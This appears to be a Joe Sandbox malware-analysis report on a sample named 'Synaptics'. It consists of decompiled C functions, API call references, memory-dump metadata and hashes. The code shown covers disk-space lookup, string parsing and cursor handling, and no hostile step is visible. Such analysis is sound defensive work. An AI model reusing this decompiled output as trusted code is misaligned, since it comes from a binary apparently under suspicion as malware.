                                                                                                                                                                                                                            • Opcode ID: 3274c0dfdbe0219fc24fefe6f8f375bc8f66ff92587090afc903952a86c72523
                                                                                                                                                                                                                            • Instruction ID: 696a0ad0a36b5a628bc16ef9a9fef7e4a028d98c1b31806480246e0535002fd9
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3274c0dfdbe0219fc24fefe6f8f375bc8f66ff92587090afc903952a86c72523
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4DF0A2B5D0420DAFCB00DFE9C9818DEFBFCEB08250F10456AA945F3741E630AA408BA5
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0040E884() {
                                                                                                                                                                                                                            				_Unknown_base(*)()* _t1;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t3;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t1 = GetModuleHandleA("kernel32.dll");
                                                                                                                                                                                                                            				_t3 = _t1;
                                                                                                                                                                                                                            				if(_t3 != 0) {
                                                                                                                                                                                                                            					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
                                                                                                                                                                                                                            					 *0x49b158 = _t1;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				if( *0x49b158 == 0) {
                                                                                                                                                                                                                            					 *0x49b158 = E00409ED4;
                                                                                                                                                                                                                            					return E00409ED4;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t1;
                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040F2ED,00000000,0040F300), ref: 0040E88A
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0040E89B
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                            • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                                                                                                                                            • API String ID: 1646373207-3712701948
                                                                                                                                                                                                                            • Opcode ID: 48bbcabc8f02b2d24e1da495698a7276f8bc32b2cd4885076d013a1cd8d10edc
                                                                                                                                                                                                                            • Instruction ID: 06fc51cb68962c5c382d4d7a2f86af93b26a51ec458fff072f92dd4ff1898c2b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 48bbcabc8f02b2d24e1da495698a7276f8bc32b2cd4885076d013a1cd8d10edc
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CFD09E62A043C55AF700BBA6A9EA7162658D720344B24C83BA000773D2D7FD4C94979D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                            			E0041CE2C(intOrPtr* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                                            				intOrPtr* _v8;
                                                                                                                                                                                                                            				char _v12;
                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                            				void* _t71;
                                                                                                                                                                                                                            				char _t72;
                                                                                                                                                                                                                            				char _t73;
                                                                                                                                                                                                                            				intOrPtr _t88;
                                                                                                                                                                                                                            				CHAR* _t91;
                                                                                                                                                                                                                            				CHAR** _t94;
                                                                                                                                                                                                                            				void* _t95;
                                                                                                                                                                                                                            				void* _t96;
                                                                                                                                                                                                                            				void* _t97;
                                                                                                                                                                                                                            				intOrPtr _t98;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t96 = _t97;
                                                                                                                                                                                                                            				_t98 = _t97 + 0xfffffff4;
                                                                                                                                                                                                                            				_v16 = 0;
                                                                                                                                                                                                                            				_t71 = __edx;
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				_t94 =  &_v12;
                                                                                                                                                                                                                            				 *[fs:eax] = _t98;
                                                                                                                                                                                                                            				E0041BEF0(_v8);
                                                                                                                                                                                                                            				 *[fs:eax] = _t98;
                                                                                                                                                                                                                            				 *((intOrPtr*)( *_v8 + 0x44))( *[fs:eax], 0x41cf5e, _t96,  *[fs:eax], 0x41cf7b, _t96, __edi, __esi, __ebx, _t95);
                                                                                                                                                                                                                            				 *_t94 = E00404E80(_t71);
                                                                                                                                                                                                                            				while( *( *_t94) - 0xffffffffffffffe1 < 0) {
                                                                                                                                                                                                                            					 *_t94 = CharNextA( *_t94);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                            					_t72 =  *( *_t94);
                                                                                                                                                                                                                            					if(_t72 == 0) {
                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if(_t72 != E0041CFA4(_v8)) {
                                                                                                                                                                                                                            						_t91 =  *_t94;
                                                                                                                                                                                                                            						while(1) {
                                                                                                                                                                                                                            							_t73 =  *( *_t94);
                                                                                                                                                                                                                            							if(_t73 <= 0x20 || _t73 == E0041CF8C(_v8)) {
                                                                                                                                                                                                                            								break;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							 *_t94 = CharNextA( *_t94);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						E00404AB0( &_v16,  *_t94 - _t91, _t91);
                                                                                                                                                                                                                            						L11:
                                                                                                                                                                                                                            						 *((intOrPtr*)( *_v8 + 0x38))();
                                                                                                                                                                                                                            						while( *( *_t94) - 0xffffffffffffffe1 < 0) {
                                                                                                                                                                                                                            							 *_t94 = CharNextA( *_t94);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if(E0041CF8C(_v8) !=  *( *_t94)) {
                                                                                                                                                                                                                            							continue;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if( *(CharNextA( *_t94)) == 0) {
                                                                                                                                                                                                                            							 *((intOrPtr*)( *_v8 + 0x38))();
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                            							 *_t94 = CharNextA( *_t94);
                                                                                                                                                                                                                            						} while ( *( *_t94) - 0xffffffffffffffe1 < 0);
                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					E004091D4(_t94,  &_v16, E0041CFA4(_v8));
                                                                                                                                                                                                                            					goto L11;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_pop(_t88);
                                                                                                                                                                                                                            				 *[fs:eax] = _t88;
                                                                                                                                                                                                                            				_push(E0041CF65);
                                                                                                                                                                                                                            				return E0041BFAC(_v8);
                                                                                                                                                                                                                            			}

















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CharNextA.USER32(?,?,00000000,0041CF7B,?,?,00000000,00000000), ref: 0041CE7C
                                                                                                                                                                                                                            • CharNextA.USER32(?,?,00000000,0041CF7B,?,?,00000000,00000000), ref: 0041CEF4
                                                                                                                                                                                                                            • CharNextA.USER32(?,?,?,00000000,0041CF7B,?,?,00000000,00000000), ref: 0041CF15
                                                                                                                                                                                                                            • CharNextA.USER32(00000000,?,?,?,00000000,0041CF7B,?,?,00000000,00000000), ref: 0041CF2C
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CharNext
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3213498283-0
                                                                                                                                                                                                                            • Opcode ID: 1fdf7e38554d3ddef2dffed84f85b628e6addbc14ec20851bbf473ee18a56b48
                                                                                                                                                                                                                            • Instruction ID: 11efbd69cb5f73df2cbcf5fefe28e22a1c1bddc5dbaf51a38cd0fed122abd7e5
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1fdf7e38554d3ddef2dffed84f85b628e6addbc14ec20851bbf473ee18a56b48
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A1415130A44244DFCB11DF79C991999BBF6EF5A30472404AAF4C1D7392C738AD82DB99
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                            			E00438E8C(intOrPtr* __eax, signed int __edx) {
                                                                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                            				char _v24;
                                                                                                                                                                                                                            				char _v28;
                                                                                                                                                                                                                            				intOrPtr _t49;
                                                                                                                                                                                                                            				intOrPtr _t50;
                                                                                                                                                                                                                            				intOrPtr _t53;
                                                                                                                                                                                                                            				intOrPtr _t54;
                                                                                                                                                                                                                            				intOrPtr _t55;
                                                                                                                                                                                                                            				intOrPtr _t56;
                                                                                                                                                                                                                            				intOrPtr* _t60;
                                                                                                                                                                                                                            				intOrPtr* _t62;
                                                                                                                                                                                                                            				struct HICON__* _t65;
                                                                                                                                                                                                                            				intOrPtr _t67;
                                                                                                                                                                                                                            				intOrPtr* _t72;
                                                                                                                                                                                                                            				intOrPtr _t74;
                                                                                                                                                                                                                            				intOrPtr* _t75;
                                                                                                                                                                                                                            				intOrPtr _t78;
                                                                                                                                                                                                                            				intOrPtr _t80;
                                                                                                                                                                                                                            				intOrPtr _t82;
                                                                                                                                                                                                                            				intOrPtr _t84;
                                                                                                                                                                                                                            				intOrPtr _t85;
                                                                                                                                                                                                                            				struct HWND__* _t88;
                                                                                                                                                                                                                            				intOrPtr _t89;
                                                                                                                                                                                                                            				intOrPtr _t91;
                                                                                                                                                                                                                            				intOrPtr* _t93;
                                                                                                                                                                                                                            				intOrPtr _t97;
                                                                                                                                                                                                                            				intOrPtr _t100;
                                                                                                                                                                                                                            				intOrPtr _t102;
                                                                                                                                                                                                                            				intOrPtr _t103;
                                                                                                                                                                                                                            				intOrPtr _t104;
                                                                                                                                                                                                                            				intOrPtr _t106;
                                                                                                                                                                                                                            				struct HWND__* _t107;
                                                                                                                                                                                                                            				intOrPtr _t108;
                                                                                                                                                                                                                            				intOrPtr _t110;
                                                                                                                                                                                                                            				intOrPtr _t114;
                                                                                                                                                                                                                            				intOrPtr _t117;
                                                                                                                                                                                                                            				char _t118;
                                                                                                                                                                                                                            				intOrPtr _t119;
                                                                                                                                                                                                                            				void* _t131;
                                                                                                                                                                                                                            				intOrPtr _t135;
                                                                                                                                                                                                                            				intOrPtr _t140;
                                                                                                                                                                                                                            				intOrPtr* _t155;
                                                                                                                                                                                                                            				void* _t158;
                                                                                                                                                                                                                            				void* _t165;
                                                                                                                                                                                                                            				void* _t166;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t155 = __eax;
                                                                                                                                                                                                                            				if( *0x49eb54 != 0) {
                                                                                                                                                                                                                            					L3:
                                                                                                                                                                                                                            					_t49 =  *0x49eb34; // 0x0
                                                                                                                                                                                                                            					_t50 =  *0x49eb34; // 0x0
                                                                                                                                                                                                                            					_t117 = E00438D6C(_t155,  *((intOrPtr*)(_t50 + 0x9b)),  &_v28, _t49);
                                                                                                                                                                                                                            					if( *0x49eb54 == 0) {
                                                                                                                                                                                                                            						_t168 =  *0x49eb58;
                                                                                                                                                                                                                            						if( *0x49eb58 != 0) {
                                                                                                                                                                                                                            							_t106 =  *0x49eb48; // 0x0
                                                                                                                                                                                                                            							_t107 = GetDesktopWindow();
                                                                                                                                                                                                                            							_t108 =  *0x49eb58; // 0x0
                                                                                                                                                                                                                            							E00443038(_t108, _t107, _t168, _t106);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t53 =  *0x49eb34; // 0x0
                                                                                                                                                                                                                            					if( *((char*)(_t53 + 0x9b)) != 0) {
                                                                                                                                                                                                                            						__eflags =  *0x49eb54;
                                                                                                                                                                                                                            						_t6 =  &_v24;
                                                                                                                                                                                                                            						 *_t6 =  *0x49eb54 != 0;
                                                                                                                                                                                                                            						__eflags =  *_t6;
                                                                                                                                                                                                                            						 *0x49eb54 = 2;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						 *0x49eb54 = 1;
                                                                                                                                                                                                                            						_v24 = 0;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t54 =  *0x49eb38; // 0x0
                                                                                                                                                                                                                            					if(_t117 ==  *((intOrPtr*)(_t54 + 4))) {
                                                                                                                                                                                                                            						L12:
                                                                                                                                                                                                                            						_t55 =  *0x49eb38; // 0x0
                                                                                                                                                                                                                            						 *((intOrPtr*)(_t55 + 0xc)) =  *_t155;
                                                                                                                                                                                                                            						 *((intOrPtr*)(_t55 + 0x10)) =  *((intOrPtr*)(_t155 + 4));
                                                                                                                                                                                                                            						_t56 =  *0x49eb38; // 0x0
                                                                                                                                                                                                                            						if( *((intOrPtr*)(_t56 + 4)) != 0) {
                                                                                                                                                                                                                            							_t97 =  *0x49eb38; // 0x0
                                                                                                                                                                                                                            							E0043AAC0( *((intOrPtr*)(_t97 + 4)),  &_v20, _t155);
                                                                                                                                                                                                                            							_t100 =  *0x49eb38; // 0x0
                                                                                                                                                                                                                            							 *((intOrPtr*)(_t100 + 0x14)) = _v20;
                                                                                                                                                                                                                            							 *((intOrPtr*)(_t100 + 0x18)) = _v16;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t131 = E00438DBC(2);
                                                                                                                                                                                                                            						_t121 =  *_t155;
                                                                                                                                                                                                                            						_t60 =  *0x49eb38; // 0x0
                                                                                                                                                                                                                            						_t158 =  *((intOrPtr*)( *_t60 + 4))( *((intOrPtr*)(_t155 + 4)));
                                                                                                                                                                                                                            						if( *0x49eb58 != 0) {
                                                                                                                                                                                                                            							if(_t117 == 0 || ( *(_t117 + 0x51) & 0x00000020) != 0) {
                                                                                                                                                                                                                            								_t82 =  *0x49eb58; // 0x0
                                                                                                                                                                                                                            								E00443020(_t82, _t158);
                                                                                                                                                                                                                            								_t84 =  *0x49eb58; // 0x0
                                                                                                                                                                                                                            								_t177 =  *((char*)(_t84 + 0x6a));
                                                                                                                                                                                                                            								if( *((char*)(_t84 + 0x6a)) != 0) {
                                                                                                                                                                                                                            									_t121 =  *((intOrPtr*)(_t155 + 4));
                                                                                                                                                                                                                            									_t85 =  *0x49eb58; // 0x0
                                                                                                                                                                                                                            									E00443120(_t85,  *((intOrPtr*)(_t155 + 4)),  *_t155, __eflags);
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									_t88 = GetDesktopWindow();
                                                                                                                                                                                                                            									_t121 =  *_t155;
                                                                                                                                                                                                                            									_t89 =  *0x49eb58; // 0x0
                                                                                                                                                                                                                            									E00443038(_t89, _t88, _t177,  *((intOrPtr*)(_t155 + 4)));
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								_t91 =  *0x49eb58; // 0x0
                                                                                                                                                                                                                            								E00443194(_t91, _t131, __eflags);
                                                                                                                                                                                                                            								_t93 =  *0x49de0c; // 0x49ebbc
                                                                                                                                                                                                                            								SetCursor(E004586EC( *_t93, _t158));
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t62 =  *0x49de0c; // 0x49ebbc
                                                                                                                                                                                                                            						_t65 = SetCursor(E004586EC( *_t62, _t158));
                                                                                                                                                                                                                            						if( *0x49eb54 != 2) {
                                                                                                                                                                                                                            							L32:
                                                                                                                                                                                                                            							return _t65;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							_t179 = _t117;
                                                                                                                                                                                                                            							if(_t117 != 0) {
                                                                                                                                                                                                                            								_t118 = E00438DF8(_t121);
                                                                                                                                                                                                                            								_t67 =  *0x49eb38; // 0x0
                                                                                                                                                                                                                            								 *((intOrPtr*)(_t67 + 0x58)) = _t118;
                                                                                                                                                                                                                            								__eflags = _t118;
                                                                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                                                                            									E0043AAC0(_t118,  &_v24, _t155);
                                                                                                                                                                                                                            									_t65 = E00403DE8(_t118, __eflags);
                                                                                                                                                                                                                            									_t135 =  *0x49eb38; // 0x0
                                                                                                                                                                                                                            									 *(_t135 + 0x54) = _t65;
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									_t78 =  *0x49eb38; // 0x0
                                                                                                                                                                                                                            									_t65 = E00403DE8( *((intOrPtr*)(_t78 + 4)), __eflags);
                                                                                                                                                                                                                            									_t140 =  *0x49eb38; // 0x0
                                                                                                                                                                                                                            									 *(_t140 + 0x54) = _t65;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								_push( *((intOrPtr*)(_t155 + 4)));
                                                                                                                                                                                                                            								_t80 =  *0x49eb38; // 0x0
                                                                                                                                                                                                                            								_t65 = E00403DE8( *((intOrPtr*)(_t80 + 0x38)), _t179);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							if( *0x49eb38 == 0) {
                                                                                                                                                                                                                            								goto L32;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								_t119 =  *0x49eb38; // 0x0
                                                                                                                                                                                                                            								_t41 = _t119 + 0x5c; // 0x5c
                                                                                                                                                                                                                            								_t42 = _t119 + 0x44; // 0x44
                                                                                                                                                                                                                            								_t65 = E00408E50(_t42, 0x10, _t41);
                                                                                                                                                                                                                            								if(_t65 != 0) {
                                                                                                                                                                                                                            									goto L32;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								if(_v28 != 0) {
                                                                                                                                                                                                                            									_t75 =  *0x49eb38; // 0x0
                                                                                                                                                                                                                            									 *((intOrPtr*)( *_t75 + 0x34))();
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								_t72 =  *0x49eb38; // 0x0
                                                                                                                                                                                                                            								 *((intOrPtr*)( *_t72 + 0x30))();
                                                                                                                                                                                                                            								_t74 =  *0x49eb38; // 0x0
                                                                                                                                                                                                                            								asm("movsd");
                                                                                                                                                                                                                            								asm("movsd");
                                                                                                                                                                                                                            								asm("movsd");
                                                                                                                                                                                                                            								asm("movsd");
                                                                                                                                                                                                                            								return _t74;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t65 = E00438DBC(1);
                                                                                                                                                                                                                            					if( *0x49eb38 == 0) {
                                                                                                                                                                                                                            						goto L32;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t102 =  *0x49eb38; // 0x0
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t102 + 4)) = _t117;
                                                                                                                                                                                                                            					_t103 =  *0x49eb38; // 0x0
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t103 + 8)) = _v28;
                                                                                                                                                                                                                            					_t104 =  *0x49eb38; // 0x0
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t104 + 0xc)) =  *_t155;
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t104 + 0x10)) =  *((intOrPtr*)(_t155 + 4));
                                                                                                                                                                                                                            					_t65 = E00438DBC(0);
                                                                                                                                                                                                                            					if( *0x49eb38 == 0) {
                                                                                                                                                                                                                            						goto L32;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					goto L12;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t110 =  *0x49eb44; // 0x0
                                                                                                                                                                                                                            				asm("cdq");
                                                                                                                                                                                                                            				_t165 = (_t110 -  *__eax ^ __edx) - __edx -  *0x49eb50; // 0x0
                                                                                                                                                                                                                            				if(_t165 >= 0) {
                                                                                                                                                                                                                            					goto L3;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t114 =  *0x49eb48; // 0x0
                                                                                                                                                                                                                            				asm("cdq");
                                                                                                                                                                                                                            				_t65 = (_t114 -  *((intOrPtr*)(__eax + 4)) ^ __edx) - __edx;
                                                                                                                                                                                                                            				_t166 = _t65 -  *0x49eb50; // 0x0
                                                                                                                                                                                                                            				if(_t166 < 0) {
                                                                                                                                                                                                                            					goto L32;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				goto L3;
                                                                                                                                                                                                                            			}

















































                                                                                                                                                                                                                            0x00439016
                                                                                                                                                                                                                            0x0043901b
                                                                                                                                                                                                                            0x0043901f
                                                                                                                                                                                                                            0x0043903a
                                                                                                                                                                                                                            0x0043903f
                                                                                                                                                                                                                            0x00439044
                                                                                                                                                                                                                            0x00439021
                                                                                                                                                                                                                            0x00439025
                                                                                                                                                                                                                            0x0043902c
                                                                                                                                                                                                                            0x0043902e
                                                                                                                                                                                                                            0x00439033
                                                                                                                                                                                                                            0x00439033
                                                                                                                                                                                                                            0x0043904b
                                                                                                                                                                                                                            0x0043904b
                                                                                                                                                                                                                            0x00439050
                                                                                                                                                                                                                            0x00439058
                                                                                                                                                                                                                            0x00439065
                                                                                                                                                                                                                            0x00439065
                                                                                                                                                                                                                            0x00439002
                                                                                                                                                                                                                            0x0043906d
                                                                                                                                                                                                                            0x0043907a
                                                                                                                                                                                                                            0x00439086
                                                                                                                                                                                                                            0x00439159
                                                                                                                                                                                                                            0x00439159
                                                                                                                                                                                                                            0x0043908c
                                                                                                                                                                                                                            0x0043908c
                                                                                                                                                                                                                            0x0043908e
                                                                                                                                                                                                                            0x004390af
                                                                                                                                                                                                                            0x004390b1
                                                                                                                                                                                                                            0x004390b6
                                                                                                                                                                                                                            0x004390b9
                                                                                                                                                                                                                            0x004390bb
                                                                                                                                                                                                                            0x004390e9
                                                                                                                                                                                                                            0x004390f8
                                                                                                                                                                                                                            0x004390fd
                                                                                                                                                                                                                            0x00439103
                                                                                                                                                                                                                            0x004390bd
                                                                                                                                                                                                                            0x004390c5
                                                                                                                                                                                                                            0x004390d1
                                                                                                                                                                                                                            0x004390d6
                                                                                                                                                                                                                            0x004390dc
                                                                                                                                                                                                                            0x004390dc
                                                                                                                                                                                                                            0x00439090
                                                                                                                                                                                                                            0x00439093
                                                                                                                                                                                                                            0x00439096
                                                                                                                                                                                                                            0x004390a3
                                                                                                                                                                                                                            0x004390a3
                                                                                                                                                                                                                            0x0043910d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043910f
                                                                                                                                                                                                                            0x0043910f
                                                                                                                                                                                                                            0x00439115
                                                                                                                                                                                                                            0x00439118
                                                                                                                                                                                                                            0x00439120
                                                                                                                                                                                                                            0x00439127
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043912e
                                                                                                                                                                                                                            0x00439130
                                                                                                                                                                                                                            0x00439137
                                                                                                                                                                                                                            0x00439137
                                                                                                                                                                                                                            0x0043913a
                                                                                                                                                                                                                            0x00439141
                                                                                                                                                                                                                            0x00439144
                                                                                                                                                                                                                            0x0043914f
                                                                                                                                                                                                                            0x00439150
                                                                                                                                                                                                                            0x00439151
                                                                                                                                                                                                                            0x00439152
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00439152
                                                                                                                                                                                                                            0x0043910d
                                                                                                                                                                                                                            0x00439086
                                                                                                                                                                                                                            0x00438f52
                                                                                                                                                                                                                            0x00438f5e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00438f64
                                                                                                                                                                                                                            0x00438f69
                                                                                                                                                                                                                            0x00438f6c
                                                                                                                                                                                                                            0x00438f74
                                                                                                                                                                                                                            0x00438f77
                                                                                                                                                                                                                            0x00438f7e
                                                                                                                                                                                                                            0x00438f84
                                                                                                                                                                                                                            0x00438f89
                                                                                                                                                                                                                            0x00438f95
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00438f95
                                                                                                                                                                                                                            0x00438e9d
                                                                                                                                                                                                                            0x00438ea4
                                                                                                                                                                                                                            0x00438ea9
                                                                                                                                                                                                                            0x00438eaf
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00438eb1
                                                                                                                                                                                                                            0x00438eb9
                                                                                                                                                                                                                            0x00438ebc
                                                                                                                                                                                                                            0x00438ebe
                                                                                                                                                                                                                            0x00438ec4
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00438F00
                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00439025
                                                                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 0043907A
                                                                                                                                                                                                                              • Part of subcall function 00443194: 73751770.COMCTL32(00000000,?,00439055), ref: 004431B0
                                                                                                                                                                                                                              • Part of subcall function 00443194: ShowCursor.USER32(000000FF,00000000,?,00439055), ref: 004431CB
                                                                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 00439065
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Cursor$DesktopWindow$73751770Show
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 978888386-0
                                                                                                                                                                                                                            • Opcode ID: 93ca7b10fa435c23d891b28464925a9332c02dd8bf1b3bb2ac27d7e48d7edd04
                                                                                                                                                                                                                            • Instruction ID: 7774f5f5771a5045a1e06358bb4aae0e40f1de296239ba1c3ef58bb47b11143b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 93ca7b10fa435c23d891b28464925a9332c02dd8bf1b3bb2ac27d7e48d7edd04
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8C919174606241DFE704DF2AD885A06B7F1BB69314F14907BE4069B3A2CB78FC85CB4A
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                                                                            			E004107F0(intOrPtr* __eax) {
                                                                                                                                                                                                                            				char _v260;
                                                                                                                                                                                                                            				char _v768;
                                                                                                                                                                                                                            				char _v772;
                                                                                                                                                                                                                            				intOrPtr* _v776;
                                                                                                                                                                                                                            				signed short* _v780;
                                                                                                                                                                                                                            				char _v784;
                                                                                                                                                                                                                            				signed int _v788;
                                                                                                                                                                                                                            				char _v792;
                                                                                                                                                                                                                            				intOrPtr* _v796;
                                                                                                                                                                                                                            				signed char _t43;
                                                                                                                                                                                                                            				intOrPtr* _t60;
                                                                                                                                                                                                                            				void* _t79;
                                                                                                                                                                                                                            				void* _t81;
                                                                                                                                                                                                                            				void* _t84;
                                                                                                                                                                                                                            				void* _t85;
                                                                                                                                                                                                                            				intOrPtr* _t92;
                                                                                                                                                                                                                            				void* _t96;
                                                                                                                                                                                                                            				char* _t97;
                                                                                                                                                                                                                            				void* _t98;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_v776 = __eax;
                                                                                                                                                                                                                            				if(( *(_v776 + 1) & 0x00000020) == 0) {
                                                                                                                                                                                                                            					E00410638(0x80070057);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t43 =  *_v776;
                                                                                                                                                                                                                            				if((_t43 & 0x00000fff) == 0xc) {
                                                                                                                                                                                                                            					if((_t43 & 0x00000040) == 0) {
                                                                                                                                                                                                                            						_v780 =  *((intOrPtr*)(_v776 + 8));
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_v780 =  *((intOrPtr*)( *((intOrPtr*)(_v776 + 8))));
                                                                                                                                                                                                                            					}
